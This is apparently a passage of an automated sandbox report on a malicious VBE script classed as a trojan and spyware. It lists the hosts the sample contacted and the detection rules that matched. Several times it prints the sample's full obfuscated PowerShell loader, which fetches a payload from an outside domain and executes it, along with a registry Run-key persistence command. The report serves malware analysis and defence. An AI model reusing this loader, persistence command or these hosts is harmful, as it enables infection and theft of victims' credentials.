              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.pr
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.prm
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582E77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.prmP
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.prmXR
              Source: msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/u
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020BA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B1B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020B45000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/T
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBLr
              Source: unknown | HTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49682 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49694 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2

              System Summary

              Source: amsi32_2032.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF93686AB263_2_00007FF93686AB26
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF93686B8D23_2_00007FF93686B8D2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF936939EFA3_2_00007FF936939EFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF93693A70A3_2_00007FF93693A70A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF936932D293_2_00007FF936932D29
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065185015_2_20651850
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065CDC015_2_2065CDC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20652A9015_2_20652A90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20651FA815_2_20651FA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065184115_2_20651841
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065004015_2_20650040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065944815_2_20659448
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065EC2815_2_2065EC28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065001315_2_20650013
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065EC1815_2_2065EC18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20658CC015_2_20658CC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F4C815_2_2065F4C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F4D815_2_2065F4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F08015_2_2065F080
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065514815_2_20655148
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F92515_2_2065F925
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F93015_2_2065F930
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5862
              Source: unknown Process created: Commandline size = 5862
              Source: amsi32_2032.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: powershell.exe, 00000003.00000002.1220484407.000002758104C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.VBPE
              Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBE@15/11@4/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Sammenbinder.Moe
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1644:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flragmth.tgx.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6564
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2032
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020D3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D61000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D2D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020D1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 4500149631.vbe Virustotal: Detection: 29%
              Source: 4500149631.vbe ReversingLabs: Detection: 15%
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
